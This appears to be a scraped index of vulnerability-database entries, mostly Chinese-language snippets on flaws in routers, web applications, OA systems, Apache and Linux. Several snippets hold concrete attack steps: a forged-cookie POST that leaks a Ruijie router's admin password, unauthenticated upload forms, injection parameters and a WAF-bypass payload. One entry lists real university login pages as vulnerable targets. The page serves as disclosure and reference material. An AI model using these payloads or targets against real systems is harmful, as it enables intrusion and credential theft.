Ruijie Router NBR 信息泄漏漏洞

使用ModifyHeaders修改Cookie头为：auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;使用Hackbar发送POST包到：http://localhost/WEBVMS/LEVEL15/内容为：command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIVEXEC&signname=Red-Giant. 得到admin的帐号密码。 !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req fr...

Fortinet FortiWeb 授权命令注入漏洞（CVE-2021-22123）

Fortinet FortiWeb OS Command Injection Aug 17, 2021 5 min read An OS command injection vulnerability in FortiWeb's management interface version 6.3.11 and prior can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is ...

致远A8协同系统存在任意用户密码修改漏洞（秒改）

简要描述： 不仅仅修改密码，还可以禁用、删除、添加用户 上传下载文件等等 详细说明： 协同系统的一些接口如下： 1.2 验证服务 服务名称：authorityService WSDL：http://host:port/seeyon/services/authorityService?wsdl 1.2.1 登录验证 ... 身份验证令牌实体（UserToken） ... 身份验证 使用用户名和密码进行身份验证。 用户名不能更改，必须使用 ，缺省密码为...

vBulletin /forumrunner/request.php SQL injection vulnerability

Author: janesknow Chong Yu 404 security lab Date: 2016-11-15 Vulnerability overview Vulnerability description vBulletin is a commercial Forum application, using PHP language, researchers have found that the VBulletin core plug-in forumrunner presence of SQL injection vulnerabilities: CVE-2016-619...

Webfroot Shoutbox 2.32 Expanded.PHP Remote Directory Traversal Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7775/info A problem in Shoutbox may result in traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to the expanded.php script, and could allow the viewing of potentially...

eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities

No description provided by source. eSyndiCat: Multiple SQL Injection's http://www.esyndicat.net/ ---------------------------------------------------------- Exploit coded and founded by d3v1l Date: 14.07.2007 [email protected] ----------------------------------------------------------- Greetz tO...

Apache HTTP Server多个模块主机名和URI跨站脚本漏洞

BUGTRAQ ID: 58165 CVECAN ID: CVE-2012-3499 Apache HTTP Server是开源HTTP服务器。 Apache HTTP Server 2.4.4及之前版本在实现上存在多个XSS漏洞，通过模块1 modimagemap, 2 modinfo, 3 modldap, 4 modproxyftp, 5 modstatus内的主机名和URI，远程攻击者可利用此漏洞注入任意js脚本和HTML。 0 Apache Group HTTP Server 2.4.x Apache Group HTTP Server 2.2.x 厂商补丁： Apache...

多个浏览器WEB代理重定向处理中间人漏洞

Bugraq ID: 35412 CVE ID：CVE-2009-2061 CVE-2009-2062 CVE-2009-2063 多个浏览器处理WEB代理重定向存在中间人攻击。 攻击者可以利用这个漏洞进行钓鱼攻击或获得敏感信息。不过要利用此漏洞，攻击者必须截获或控制网络通信，如通过中间人，DNS毒药等攻击。 如下浏览器受此漏洞影响： Mozilla Firefox prior to 3.0.10 Apple Safari prior to 3.2.2 Opera prior to 9.25 Opera Software Opera Web Browser 8.51 Opera...

Linux Polkit权限提升漏洞（CVE-2021-3560）

Privilege escalation with polkit: How to get root on Linux with a seven- year-old bug Kevin Backhouse https://github.blog/author/kevinbackhouse/ polkit is a system service installed by default on many Linux distributions. It's used by systemd, so any Linux distribution that uses systemd also uses...

OpenSSH X连接会话劫持漏洞

BUGTRAQ ID: 28444 CVECAN ID: CVE-2008-1483 OpenSSH是一种开放源码的SSH协议的实现，初始版本用于OpenBSD平台，现在已经被移植到多种Unix/Linux类操作系统下。 在通过启用了X11转发的SSH登录时，sshd8没有正确地处理无法绑定到IPv4端口但成功绑定到IPv6端口的情况。在这种情况下，使用X11的设备即使没有被sshd8绑定也会连接到IPv4端口，因此无法安全的进行转发。 恶意用户可以在未使用的IPv4端口（如tcp...

Oracle 2009年4月紧急补丁更新修复多个漏洞

BUGTRAQ ID: 34461 CVECAN ID:...

用友致远A8协同管理软件 status.jsp 敏感信息泄漏

致远A8-m协同管理软件，是一套可以帮助大型组织、集团型企业、政府单位以及涉外组织，解决上述问题的协同办公管理软件。 漏洞分析： 致远A8-m协同管理软件对敏感文件的访问控制不当导致大量敏感信息泄漏。 漏洞利用： http://x.x.x.x/seeyon/management/status.jsp 该地址为性能监控后台，存在未授权访问...

Mambo cropimage Component <= 1.0 Remote File Include Vulnerability

No description provided by source. C Y B E R - W A R R I O R T I M Mambo comcropimage 1.0 Component Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: in admin.cropcanvas.php , line 7 requireonce $cropimagedir."class.cropinterface.php"; Fix: 1-open...

强智科技教务管理系统SQL注射漏洞

简要描述： 男：问世间情为何物,只...女:一个大嘴巴子打上去,啪！去你妈逼的程序员还想找女朋友,活该死在代码上. 详细说明： 应乌云要求，五个案例！ http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp http://221.232.159.24/dhjw/jwxs/login.asp http://jiaowu.hustwenhua.net/jwxs/login.asp http://xscx.cmcedu.cn/jwxs/login.asp http://jwxt.hycgy.com:5000/jwxs/login.asp 登录的时候抓包 PO...

Jax Guestbook 3.50 Page Parameter Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/17560/info Jax Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browse...

Elasticsearch ECE 7.13.3信息泄露漏洞（CVE-2021-22146）

Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump Date: 2021-07-21 Exploit Author: Joan Martinez @magichk Vendor Homepage: https://www.elastic.co/ Software Link: https://www.elastic.co/ Version: = 7.10.0 to = 7.13.3 Tested on: Elastic ECE Cloud CVE : CVE-2021-22146 Reference:...

Apache 'mod_deflate'远程拒绝服务漏洞

Bugraq ID: 35623 CVE ID：CVE-2009-1891 Apache是一款流行HTTP服务程序。 Apache moddeflat模块不正确处理特殊请求，远程攻击者可以利用漏洞使服务程序崩溃。 当moddeflate启用时下载一个文件，在结束之前中止连接，会使CPU压缩文件达到100%利用率。 即使一个不太大的文件几MB，通过在这个文件中提交同步请求并马上中止连接，由于这个文件在平行过程中多次压缩，可导致消耗大量CPU时间而造成拒绝服务攻击。 Apache Software Foundation Apache 2.2.11 Apache Software...

UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? // UBB.threads Multiple input validation error // Discovered By : HACKERS PAL // Copy rights : HACKERS PAL // Website : http://www.soqor.net // Email Address : [email protected] // Tested on Version 6 6.5.1.1 and other...

万户OA系统jsFileUpload.jsp文件上传漏洞

万户OA系统jsFileUpload.jsp存在文件上传漏洞 上传url： /defaultroot/workflow/jsFileUpload.jsp 该处只允许上传JSP文件，其它的文件不可以 文件位置： /defaultroot/devform/workflow/原上传文件名...

Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit

No description provided by source. / Apache Magica by Kingcope / / gcc apache-magika.c -o apache-magika -lssl / / This is a code execution bug in the combination of Apache and PHP. On Debian and Ubuntu the vulnerability is present in the default install of the php5-cgi package. When the php5-cgi...

TRS WCM5.2 任意文件上传漏洞

漏洞影响版本WCM5.2，其他版本未测试TRS WCM的Web Service提供了向服务器写入文件的方式，可以直接写jsp文件获取webshell。通过访问http://xxx.com/wcm/services可以查看TRS WCM的Web...

phpLDAPadmin functions.php 远程PHP代码注入漏洞

BUGTRAQ ID: 50331 phpLDAPadmin是基于web的LDAP客户端，允许方便的管理LDAP服务器。 phpLDAPadmin在实现上存在远程PHP代码注入漏洞，攻击者可利用此漏洞在受影响应用程序中注入和执行PHP代码，控制系统。 1）cmd.php中的URL后附加的输入在返回给用户之前没有正确过滤，可被利用在受影响站点用户浏览器中执行任意HTML和脚本代码。 2）cmd.php中的"orderby"参数中传递的输入在用于"createfunction"函数调用之前，没有在lib/functions.php中正确过滤。可被利用注入和执行任意PHP代码。...

AlstraSoft AskMe Pro &lt;= 2.1 Multiple SQL Injection Vulnerabilities

No description provided by source. -+================================================================================+- -+ AlstraSoft AskMe Pro = 2.1 SQL Injection Vulnerabilitys +- -+================================================================================+- Discovered By: t0pP8uZz...

Ubuntu 14.04 LTS, 15.10 overlayfs - Local Root Exploit

No description provided by source. / just another overlayfs exploit, works on kernels before 2015-12-26 Exploit Title: overlayfs local root Date: 2016-01-05 Exploit Author: rebel Version: Ubuntu 14.04 LTS, 15.10 and more Tested on: Ubuntu 14.04 LTS, 15.10 CVE : CVE-2015-8660 blah@ubuntu:$ id...

Mambo Open Source 4.5/4.6 mod_mainmenu.php Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/9445/info It has been reported that Mambo Open Source may be prone to a remote file include vulnerability that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a...

jeecms V2.4.2 ArtiSearch.do 远程命令执行漏洞

0x01 框架概述 江西金磊科技发展有限公司（以下简称金磊科技）成立于2003年，旗下产品JEECMS内容管理系统是国内java开源CMS行业知名度最高、用户量最大的站群管理系统。金磊科技是一家专注java WEB应用软件研发高新技术企业。Jeecms是基于java技术研发的站群管理系统，稳定、安全、高效、跨平台、 无限扩展是jeecms 的优点，系统支持mysql、oracle、sqlserver、db2等主流 数据库。 主页：http://www.jeecms.com 0x02 漏洞细节 谷歌搜索：inurl:jeecms/ArtiSearch.do 涉及大量案例 漏洞证明：...

BrilliantTS FUZE card (MCU firmware 0.1.73, BLE firmware 0.7.4)Vulnerability

Description of FUZE Card FUZE is an IoT device the size, shape, and thickness of a normal credit card. You program credit cards into it via Bluetooth BLE using a smart phone app. When you go to pay, you use the buttons and e-Paper display to select which card to emulate. The magnetic stripe...

cPanel多个安全漏洞

cPanel是一款基于多种语言的空间管理面板，可通过域名来管理整个站点。 cPanel存在多个安全漏洞： 1，部分日志文件以全局可读权限创建，允许攻击者查看日志文件获取敏感信息。 2，提交给FormMail.pl的输入在重定向用户之前缺少校验，可重定向用户至任意WEB站点。 3，在Cpanel::API::Fileman中生成错误消息时Locale::Maketext::maketext存在错误，允许攻击者提交特制输入可执行任意代码。 4，在某些情况下会在HOME文件创建trackupload日志，可通过符号链接攻击覆盖文件。...

泛微E-office /E-mobile/flowsorce_page.php等20处 SQL注入漏洞

0x01漏洞简介 泛微E-office在以下20处存在SQL注入漏洞 1/E-mobile/flowdopage.php?diff=delete&RUNID=1 //参数RUNID 2/E-mobile/flowdopage.php?diff=delete&flowid=1 //参数flowid 3/E-mobile/flowsorcepage.php?flowid=2 4/E-mobile/flownextpage.php?diff=candeal&detailid=2 5/E-mobile/flowimagepage.php?FLOWID=2...

MetInfo 6.0.0代码执行漏洞（后台直接拿shell）

...

lighttpd目录遍历漏洞

CVE ID：CVE-2014-2324 Lighttpd是德国软件开发者Jan Kneschke所研发的一款开源的Web服务器，它的主要特点是仅需少量的内存及CPU资源即可达到同类网页服务器的性能。 lighttpd modevhost和modsimplevhost虚拟主机模块中存在目录遍历漏洞。远程攻击者可借助特制的主机名利用该漏洞读取任意文件。 0 lighttpd 目前厂商暂无提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.lighttpd.net/2014/3/12/1.4.35/...

Etcd REST API 未授权访问漏洞

From an application security perspective databases are the most valuable parts of our systems. They store the data that gives value to our apps and companies. This data which has been entrusted to us by our users should be kept safe and away of the hands of criminals. Every developer I talk to is...

Nagios Core < 4.2.2 Curl Command Injection/Code Execution （CVE-2016-9565）

Author: p0wd3r, dawu know Chong Yu 404 security lab Date: 2016-12-15 0x00 vulnerability overview 1. Vulnerability description Nagios is a monitoring of the IT infrastructure program, recently security researchers Dawid Golunski discovered in Nagios Core there is a code execution vulnerability: an...

泛微 OA /tools/SWFUpload/upload.jsp 任意文件上传漏洞

发现 tools/SWFUpload/upload.jsp ，并未验证当前用户是否为登录状态，提交文件，可直接写入根目录下。最终得到的文件访问路径为：http://www.xxoo.com/null上传的文件名.jsp。本地构造提交表单form method='post' action='http://www.xxoo.com/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" input type="file" id="file" name="test" style="height:20px;BORDER: 8F908B...

PHP-Nuke &lt;= 7.9 Final (phpbb_root_path) Remote File Inclusions

No description provided by source. Milli-Harekat Advisory www.milli-harekat.org PHP-Nuke = All version - Remote File Include Vulnerabilities Risk : High Class: Remote Script : PHP NUKE ALL VERSION Credits : ERNE Thanks : DjReMix,Eskobar,TRIP,ßy KorsaN,OsL3m7,Poizonbox,Dilejyoner and All MHG USER...

Pulse Connect Secure 授权 RCE (CVE-2021-22937) 漏洞

...

Joomla Webring Component <= 1.0 - Remote Include Vulnerability

No description provided by source. C Y BE R - W A R R i O R T I M Joomla Webring Component componentdir Remote File Inclusion Vulnerabilities Author: xoron Class : Remote cont@ct: x0r0nathotmaildotcom Code: in admin.webring.docs.php, line 12 requireonce $componentdir. mungdocs.class.php; Google...

MS10-070 ASP.NET Padding Oracle File Download

MS10-070 ASP.NET Padding Oracle信息泄露漏洞 1.漏洞描述。 ASP.NET由于加密填充验证过程中处理错误不当，导致存在一个信息泄漏漏洞。成功利用此漏洞的攻击者可以读取服务器加密的数据，例如视图状态。 此漏洞还可以用于数据篡改，如果成功利用，可用于解密和篡改服务器加密的数据。 虽然攻击者无法利用此漏洞来执行恶意攻击代码或直接提升他们的用户权限，但此漏洞可用于信息搜集，这些信息可用于进一步攻击受影响的系统。 也就是说虽然不能直接getshell，但是理论上可以读取任意文件，包括数据库配置文件。 2.漏洞标识符： CVE： CVE-2010-3332 3.受影响...

Jackson-databind 远程代码执行漏洞(CVE-2017-17485)

jackson-rce-via-spel An example project that exploits the default typing issue in Jackson-databind https://github.com/FasterXML/jackson-databind via Spring application contexts and expressions Context The Jackson-databind project has a feature called default-typing not enabled by default. When th...

Microsoft SharePoint Server 2007 XSS Vulnerability

No description provided by source. Vulnerability ID: HTB22350 Reference: http://www.htbridge.ch/advisory/xssinmicrosoftsharepointserver2007.html http://www.microsoft.com/technet/security/advisory/983438.mspx Product: Microsoft SharePoint Server 2007 Vendor: Microsoft Corporation Vulnerable Versio...

UCenter 1.6.0 /control/admin/user.php 验证码绕过漏洞

No description provided by source...

实战绕过云锁(1.3.145)进行注入测试绕过技巧

简要描述： 这次来个实例 详细说明： @疯狗 感谢提示，参考zone http://zone.wooyun.org/content/16772 id=8E0union select ...这种方式 和id=8.0union select ... 漏洞证明： 本地搭建74cms web环境并把云锁所有防护打开。 下面注入点是把对应intval去掉后测试的 include/funwap.php function companyone$id global $db; $wheresql=" WHERE id=".$id;//这里 $sql = "select from...

FileSeek CGI Script File Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6784/info FileSeek is an example cgi-script from The CGI/Perl Cookbook from John Wiley & Sons. The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web server...

Pivot 1.0 - Remote module_db.PHP File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10553/info It has been reported that Pivot is affected by a remote file include vulnerability contained within the moduledb.php script. This issue is due to a failure of the application to properly sanitize user-supplied...

SugarCRM v6. 5. 23 PHP deserialize an object injection vulnerability

Author: p0wd3r know Chong Yu 404 security lab Date: 2016-09-12 0x00 vulnerability overview 1. Vulnerability description SugarCRM（http://www.sugarcrm.com/ is a set of open source Customer Relationship Management System. Recent researchers found in its=6.5.23 version exists in the deserialization...

Dotproject 2.0 /modules/projects/vw_files.php dPconfig[root_dir] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to includ...

webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability

No description provided by source. || || || -----------------------------------------\ == -- ----------- ---------------------------- ------------------/ ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O PROUD TO BE SPANISH! -------------------...

Gitblit源代码库验证绕过漏洞

Gitblit是一个纯Java库用来管理、查看和处理Git资料库。 Gitblit存在验证绕过额外难题，远程攻击者可以利用漏洞使用非法伪造登录凭据克隆源代码库。 Gitblit 0.6.9 厂商解决方案 Gitblit 0.7已经修复此漏洞，建议用户下载使用： http://gitblit.com/...

Ehcache RMI 远程代码执行漏洞( CVE-2020-36239)

...

Ubuntu本地提权漏洞(CVE-2017-16995)

Since commit f1174f77b50c "bpf/verifier: rework value tracking", the eBPF range tracking is security-relevant for the verification of eBPF code provided by unprivileged users. Therefore, any tiny slip-up in the arithmetic range tracking now turns into an arbitrary read+write in the full kernel...